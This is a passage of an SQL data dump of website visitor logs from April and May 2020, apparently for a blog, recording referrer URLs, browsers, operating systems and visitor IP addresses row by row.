(2168,'2020-04-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(2169,'2020-04-27','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','128.70.122.97','000',0,4,0),
(2170,'2020-04-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.142.169','000',0,1,0),
(2171,'2020-04-27','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','144.217.78.43','000',0,3,0),
(2172,'2020-04-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','129.146.176.91','000',0,1,0),
(2173,'2020-04-27','http://weblibrary.win','Unknown','Unknown','Unknown',NULL,NULL,'','54.93.223.26','000',0,2,0),
(2174,'2020-04-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','92.242.204.206','000',0,2,0),
(2175,'2020-04-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.39.5','000',0,1,0),
(2176,'2020-04-27','http://www.web-analytics.date','Unknown','Unknown','Unknown',NULL,NULL,'','18.156.176.72','000',0,2,0),
(2177,'2020-04-27','http://zonefiles.bid','Unknown','Unknown','Unknown',NULL,NULL,'','18.156.176.110','000',0,2,0),
(2178,'2020-04-27','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','113.21.96.190','000',0,1,0),
(2179,'2020-04-27','http://www.certifywebsite.win','Unknown','Unknown','Unknown',NULL,NULL,'','3.125.48.154','000',0,2,0),
(2180,'2020-04-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.36.81.153','000',0,2,0),
(2181,'2020-04-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','45.15.11.212','000',0,1,0),
(2182,'2020-04-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.88.54.15','000',0,1,0),
(2183,'2020-04-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(2184,'2020-04-27','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','202.107.188.12','000',0,3,0),
(2185,'2020-04-28','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','134.209.201.119','000',0,10,0),
(2186,'2020-04-28','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.99','000',0,1,0),
(2187,'2020-04-28','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','118.89.161.35','000',0,2,0),
(2188,'2020-04-28','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','84.17.25.191','000',0,2,0),
(2189,'2020-04-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.30.121.226','000',0,1,0),
(2190,'2020-04-28','http://ictbank.ir/blog','Chrome','OS X','10.13.4',NULL,NULL,'','166.62.126.3','000',0,1,0),
(2191,'2020-04-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.156.253.51','000',0,1,0),
(2192,'2020-04-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.158.178','000',0,1,0),
(2193,'2020-04-28','http://ictbank.ir/blog','Chrome','OS X','10.14.0',NULL,NULL,'','185.183.96.122','000',0,1,0),
(2194,'2020-04-28','http://ictbank.ir/blog','Chromium','Ubuntu','10.04',NULL,NULL,'','185.220.101.4','000',0,1,0),
(2195,'2020-04-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.126.182','000',0,1,0),
(2196,'2020-04-28','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','202.43.114.124','000',0,1,0),
(2197,'2020-04-28','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','166.114.1.8','000',0,1,0),
(2198,'2020-04-28','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','182.92.173.96','000',0,1,0),
(2199,'2020-04-28','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','35.223.79.230','000',0,1,0),
(2200,'2020-04-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.39.5','000',0,1,0),
(2201,'2020-04-28','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','129.213.60.60','000',0,1,0),
(2202,'2020-04-28','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','103.145.12.65','000',0,2,0),
(2203,'2020-04-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.195.188.88','000',0,1,0),
(2204,'2020-04-28','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','5.189.130.212','000',0,1,0),
(2205,'2020-04-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(2206,'2020-04-28','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','34.221.185.254','000',0,1,0),
(2207,'2020-04-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(2208,'2020-04-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','78.155.218.95','000',0,1,0),
(2209,'2020-04-28','http://ictbank.ir/blog','Unknown','Windows','5.1',NULL,NULL,'','46.4.33.48','000',0,1,0),
(2210,'2020-04-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','120.79.222.186','000',0,1,0),
(2211,'2020-04-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','168.138.144.172','000',0,1,0),
(2212,'2020-04-29','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','62.210.105.116','000',0,1,0),
(2213,'2020-04-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.36.81.153','000',0,2,0),
(2214,'2020-04-29','http://ictbank.ir/blog','Unknown','OS X','Unknown',NULL,NULL,'','182.16.173.34','000',0,2,0),
(2215,'2020-04-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.156.162.248','000',0,1,0),
(2216,'2020-04-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.11.56.1','000',0,1,0),
(2217,'2020-04-29','http://ictbank.ir/blog','Safari','iOS','13.4.1',NULL,NULL,'','173.252.87.5','000',0,1,0),
(2218,'2020-04-29','http://ictbank.ir/blog','Safari','iOS','13.4.1',NULL,NULL,'','173.252.87.6','000',0,1,0),
(2219,'2020-04-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.254.211.185','000',0,2,0),
(2220,'2020-04-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.203.81.42','000',0,1,0),
(2221,'2020-04-29','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(2222,'2020-04-29','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','66.240.236.119','000',0,1,0),
(2223,'2020-04-29','http://www.bing.com/search?q=amazon','Chrome','Windows','10.0',NULL,NULL,'','65.154.226.109','000',0,1,0),
(2224,'2020-04-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.57.176.6','000',0,1,0),
(2225,'2020-04-29','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(2226,'2020-04-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(2227,'2020-04-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','158.101.166.68','000',0,1,0),
(2228,'2020-04-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','130.61.249.6','000',0,1,0),
(2229,'2020-04-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','167.99.212.214','000',0,1,0),
(2230,'2020-04-30','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','180.163.220.68','000',0,1,0),
(2231,'2020-04-30','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','27.115.124.70','000',0,1,0),
(2232,'2020-04-30','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','180.163.220.3','000',0,1,0),
(2233,'2020-04-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.28.245.126','000',0,1,0),
(2234,'2020-04-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(2235,'2020-04-30','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','221.13.17.29','000',0,2,0),
(2236,'2020-04-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(2237,'2020-04-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.174.22','000',0,1,0),
(2238,'2020-04-30','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.36.81.153','000',0,1,0),
(2239,'2020-04-30','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','182.61.165.233','000',0,3,0),
(2240,'2020-04-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.165.236.222','000',0,1,0),
(2241,'2020-04-30','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','91.121.76.25','000',0,1,0),
(2242,'2020-04-30','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','80.210.237.171','000',0,1,0),
(2243,'2020-04-30','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','82.102.9.34','000',0,1,0),
(2244,'2020-04-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.122.107.46','000',0,1,0),
(2245,'2020-04-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(2246,'2020-04-30','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','37.231.90.182','000',0,1,0),
(2247,'2020-04-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(2248,'2020-04-30','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.234.218.68','000',0,1,0),
(2249,'2020-04-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(2250,'2020-05-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.144.64.98','000',0,1,0),
(2251,'2020-05-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.15.183','000',0,1,0),
(2252,'2020-05-01','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','152.67.42.40','000',0,1,0),
(2253,'2020-05-01','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','178.128.187.104','000',0,1,0),
(2254,'2020-05-01','http://ictbank.ir/blog','Chrome','OS X','10.10.5',NULL,NULL,'','162.213.36.137','000',0,1,0),
(2255,'2020-05-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.212.91','000',0,1,0),
(2256,'2020-05-01','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','45.55.176.165','000',0,1,0),
(2257,'2020-05-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.107.215','000',0,1,0),
(2258,'2020-05-01','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','61.153.110.83','000',0,2,0),
(2259,'2020-05-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(2260,'2020-05-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','40.78.0.129','000',0,1,0),
(2261,'2020-05-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.43.111','000',0,1,0),
(2262,'2020-05-01','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','129.213.59.142','000',0,1,0),
(2263,'2020-05-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(2264,'2020-05-01','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','65.151.163.244','000',0,1,0),
(2265,'2020-05-02','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','91.121.76.25','000',0,1,0),
(2266,'2020-05-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','190.4.26.125','000',0,2,0),
(2267,'2020-05-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.156.33.237','000',0,1,0),
(2268,'2020-05-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(2269,'2020-05-02','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','185.11.224.44','000',0,1,0),
(2270,'2020-05-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','54.200.80.118','000',0,1,0),
(2271,'2020-05-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.186.202.210','000',0,1,0),
(2272,'2020-05-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(2273,'2020-05-02','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','118.89.161.35','000',0,1,0),
(2274,'2020-05-02','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','141.101.143.23','000',0,2,0),
(2275,'2020-05-02','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','129.204.239.207','000',0,3,0),
(2276,'2020-05-02','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','90.154.102.15','000',0,1,0),
(2277,'2020-05-02','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','47.94.229.159','000',0,1,0),
(2278,'2020-05-02','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','109.110.235.40','000',0,1,0),
(2279,'2020-05-02','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','140.238.190.22','000',0,1,0),
(2280,'2020-05-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.164.131.248','000',0,1,0),
(2281,'2020-05-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.196.67.54','000',0,1,0),
(2282,'2020-05-02','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,1,0),
(2283,'2020-05-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(2284,'2020-05-02','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.36.81.153','000',0,1,0),
(2285,'2020-05-02','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.40.4.112','000',0,1,0),
(2286,'2020-05-03','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','59.126.66.75','000',0,1,0),
(2287,'2020-05-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.115.224','000',0,1,0),
(2288,'2020-05-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','51.158.28.134','000',0,1,0),
(2289,'2020-05-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.14.15','000',0,1,0),
(2290,'2020-05-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','70.37.64.181','000',0,1,0),
(2291,'2020-05-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(2292,'2020-05-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.81.143','000',0,1,0),
(2293,'2020-05-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.158.82','000',0,1,0),
(2294,'2020-05-03','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','154.113.16.226','000',0,3,0),
(2295,'2020-05-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.58.21.67','000',0,1,0),
(2296,'2020-05-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(2297,'2020-05-03','ictbank.ir','Chrome','Windows','5.1',NULL,NULL,'','192.185.81.159','000',0,1,0),
(2298,'2020-05-03','http://ictbank.ir/blog','Firefox','OS X','10.8',NULL,NULL,'','34.219.177.71','000',0,1,0),
(2299,'2020-05-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','54.244.133.240','000',0,1,0),
(2300,'2020-05-03','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','103.145.12.65','000',0,1,0),
(2301,'2020-05-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','47.101.165.138','000',0,1,0),
(2302,'2020-05-04','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.183.162','000',0,1,0),
(2303,'2020-05-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.237.177.49','000',0,1,0),
(2304,'2020-05-04','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','120.209.71.14','000',0,1,0),
(2305,'2020-05-04','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','183.88.216.115','000',0,1,0),
(2306,'2020-05-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.40.206.202','000',0,1,0),
(2307,'2020-05-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.109.73','000',0,1,0),
(2308,'2020-05-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.219.132.220','000',0,1,0),
(2309,'2020-05-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(2310,'2020-05-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.174.22','000',0,1,0),
(2311,'2020-05-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','209.59.181.92','000',0,1,0),
(2312,'2020-05-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(2313,'2020-05-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.254.66','000',0,1,0),
(2314,'2020-05-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(2315,'2020-05-04','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','82.28.215.161','000',0,1,0),
(2316,'2020-05-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.93.250.12','000',0,1,0),
(2317,'2020-05-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(2318,'2020-05-04','http://ictbank.ir/blog','Opera','Windows','6.2',NULL,NULL,'','52.13.126.240','000',0,1,0),
(2319,'2020-05-05','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.36.81.153','000',0,1,0),
(2320,'2020-05-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(2321,'2020-05-05','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','159.8.237.43','000',0,1,0),
(2322,'2020-05-05','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','159.8.237.35','000',0,1,0),
(2323,'2020-05-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.124.205.76','000',0,1,0),
(2324,'2020-05-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.203.81.42','000',0,1,0),
(2325,'2020-05-05','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,1,0),
(2326,'2020-05-05','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','182.140.133.153','000',0,1,0),
(2327,'2020-05-05','http://ictbank.ir/blog','Chrome','OS X','10.12.6',NULL,NULL,'','139.99.99.5','000',0,1,0),
(2328,'2020-05-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.37.255','000',0,1,0),
(2329,'2020-05-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.123.36.220','000',0,1,0),
(2330,'2020-05-05','http://ictbank.ir/blog','Chrome','OS X','10.10.5',NULL,NULL,'','162.213.39.178','000',0,1,0),
(2331,'2020-05-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(2332,'2020-05-05','http://ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','176.122.120.210','000',0,1,0),
(2333,'2020-05-06','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','51.91.129.4','000',0,1,0),
(2334,'2020-05-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.124.184.67','000',0,1,0),
(2335,'2020-05-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(2336,'2020-05-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.254.66','000',0,1,0),
(2337,'2020-05-06','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','82.80.249.243','000',0,2,0),
(2338,'2020-05-06','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','104.155.164.70','000',0,3,0),
(2339,'2020-05-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.88.181','000',0,1,0),
(2340,'2020-05-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.90.119','000',0,1,0),
(2341,'2020-05-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(2342,'2020-05-06','http://ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','176.122.120.210','000',0,1,0),
(2343,'2020-05-07','http://ictbank.ir/blog','Unknown','Windows','5.1',NULL,NULL,'','46.4.33.48','000',0,1,0),
(2344,'2020-05-07','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','220.164.2.121','000',0,1,0),
(2345,'2020-05-07','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','104.238.118.17','000',0,1,0),
(2346,'2020-05-07','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','37.192.36.170','000',0,1,0),
(2347,'2020-05-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.158.108.112','000',0,1,0),
(2348,'2020-05-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.159.18.103','000',0,1,0),
(2349,'2020-05-07','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','158.46.212.224','000',0,1,0),
(2350,'2020-05-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.42.189','000',0,1,0),
(2351,'2020-05-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(2352,'2020-05-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.14.15','000',0,1,0),
(2353,'2020-05-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.124.190.50','000',0,1,0),
(2354,'2020-05-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(2355,'2020-05-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.121','000',0,3,0),
(2356,'2020-05-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(2357,'2020-05-07','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','221.199.41.218','000',0,1,0),
(2358,'2020-05-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','195.62.32.135','000',0,1,0),
(2359,'2020-05-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','95.217.62.181','000',0,1,0),
(2360,'2020-05-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','5.188.62.25','000',0,1,0),
(2361,'2020-05-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.235.150.79','000',0,1,0),
(2362,'2020-05-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.127.21.249','000',0,1,0),
(2363,'2020-05-08','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.173.147.197','000',0,1,0),
(2364,'2020-05-08','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','203.147.71.11','000',0,1,0),
(2365,'2020-05-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.203.81.42','000',0,1,0),
(2366,'2020-05-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.121','000',0,3,0),
(2367,'2020-05-08','http://ictbank.ir/blog','Firefox','Ubuntu','9.10',NULL,NULL,'','167.99.102.248','000',0,1,0),
(2368,'2020-05-08','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','192.227.223.220','000',0,3,0),
(2369,'2020-05-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.88.54.15','000',0,1,0),
(2370,'2020-05-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(2371,'2020-05-08','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','106.13.227.18','000',0,1,0),
(2372,'2020-05-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.123.42.174','000',0,1,0),
(2373,'2020-05-08','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.234.218.68','000',0,1,0),
(2374,'2020-05-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(2375,'2020-05-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','188.165.235.173','000',0,1,0),
(2376,'2020-05-08','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','39.107.238.8','000',0,1,0),
(2377,'2020-05-09','http://design-arena.ir/','Firefox','OS X','10.27.80',NULL,NULL,'','2.95.220.131','000',0,1,0),
(2378,'2020-05-09','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','223.12.75.145','000',0,1,0),
(2379,'2020-05-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.57.7.135','000',0,1,0),
(2380,'2020-05-09','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.52.254','000',0,1,0),
(2381,'2020-05-09','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','103.145.12.65','000',0,1,0),
(2382,'2020-05-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','62.173.145.68','000',0,1,0),
(2383,'2020-05-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(2384,'2020-05-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.120.31.179','000',0,1,0),
(2385,'2020-05-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(2386,'2020-05-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(2387,'2020-05-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.121','000',0,3,0),
(2388,'2020-05-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.121.189.15','000',0,1,0),
(2389,'2020-05-10','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','211.149.233.239','000',0,1,0),
(2390,'2020-05-10','http://ictbank.ir/blog','Chrome','Android','10',NULL,NULL,'','5.114.46.180','000',0,2,0),
(2391,'2020-05-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(2392,'2020-05-10','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','61.150.76.90','000',0,1,0),
(2393,'2020-05-10','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','61.177.25.58','000',0,1,0),
(2394,'2020-05-10','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','60.174.192.240','000',0,1,0),
(2395,'2020-05-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','103.145.12.65','000',0,2,0),
(2396,'2020-05-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.196.90.5','000',0,1,0),
